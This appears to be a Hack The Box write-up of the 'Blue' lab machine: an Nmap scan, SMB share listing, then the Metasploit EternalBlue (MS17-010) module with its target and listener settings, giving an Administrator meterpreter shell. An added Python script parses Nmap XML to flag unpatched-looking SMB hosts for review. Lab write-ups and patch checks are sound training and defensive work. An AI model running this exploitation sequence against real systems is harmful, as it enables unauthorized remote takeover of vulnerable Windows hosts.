
Blue HTB Write-Up

JoshLHacking

Started with an Nmap scan




The output of the Nmap scan shows us that the machine is using SMB, and because I used the option -A in the Nmap command, I was able to see that the SMB version running was 2.1, and the Operating System version was Windows 7.






We can attempt to list out the available SMB shares without authentication by using the smbclient tool.








We can try to connect to 'Users' and 'Share' shares but I know from experience that the SMB version 2.1 is vulnerable to the EternalBlue exploit.

(If you didn't know this, that's fine; a simple Google search for 'SMB 2.1 exploit' would lead you to this.)


I chose to perform this exploit using Metasploit: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/


The above link tells us to use the exploit:


Then we can set the following options:

set rhost 10.10.10.40

set lhost tun0

We enumerated earlier from the Nmap scan that the OS version was Windows 7.

Entering 'show targets', we can see that the option for this is 1.

set target 1

Now we can ensure these options were correctly applied using the options command.

After this we can enter exploit or run.

We get a meterpreter shell, and with a getuid we can see we are Administrator (so no need for any privilege escalation).

Now we cd into the Desktop of the machine and use the type command to output the flag.

Congratulations, you have completed this box!!
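From the defender's side, the two facts the Nmap scan surfaced here (SMB reachable on 445/tcp and an OS guess of Windows 7) are enough to put a host on a patch-verification list for the MS17-010 bulletin named in the Metasploit module above. The script below is an added example, not part of the original write-up: it reads Nmap XML output (as written by -oX) and lists such hosts. The sample XML, the function names and the 192.0.2.x addresses are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample in Nmap's XML output format (-oX); not the scan from this write-up.
SAMPLE_XML = """<nmaprun>
 <host><address addr="10.10.10.40" addrtype="ipv4"/>
  <ports>
   <port protocol="tcp" portid="135"><state state="open"/></port>
   <port protocol="tcp" portid="445"><state state="open"/></port>
  </ports>
  <os><osmatch name="Microsoft Windows 7 SP1" accuracy="100"/></os>
 </host>
 <host><address addr="192.0.2.15" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports>
  <os><osmatch name="Microsoft Windows 7 SP1" accuracy="96"/></os>
 </host>
 <host><address addr="192.0.2.20" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
  <os><osmatch name="Microsoft Windows Server 2019" accuracy="95"/></os>
 </host>
</nmaprun>"""


def port_is_open(host, portid):
    """True only when the TCP port's state is 'open' (not 'filtered' or 'closed')."""
    for port in host.iter("port"):
        if port.get("protocol") == "tcp" and port.get("portid") == portid:
            state = port.find("state")
            return state is not None and state.get("state") == "open"
    return False


def hosts_needing_review(xml_text, os_keyword="Windows 7", portid="445"):
    """Return (address, os_name) for hosts with SMB open and a matching OS guess."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        # Nmap may list several OS guesses; use the one with the highest accuracy.
        guesses = sorted(host.iter("osmatch"),
                         key=lambda m: int(m.get("accuracy", "0")), reverse=True)
        best_os = guesses[0].get("name", "") if guesses else ""
        if addr is not None and port_is_open(host, portid) and os_keyword.lower() in best_os.lower():
            findings.append((addr.get("addr"), best_os))
    return findings


if __name__ == "__main__":
    for address, os_name in hosts_needing_review(SAMPLE_XML):
        print(f"{address}: {os_name}, 445/tcp open -> verify MS17-010 patch status")
```

An OS guess from a scan is only a lead; confirm the installed updates on each listed host before closing the finding.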


©2022 by Hack The Box Write-Ups By Josh Lees
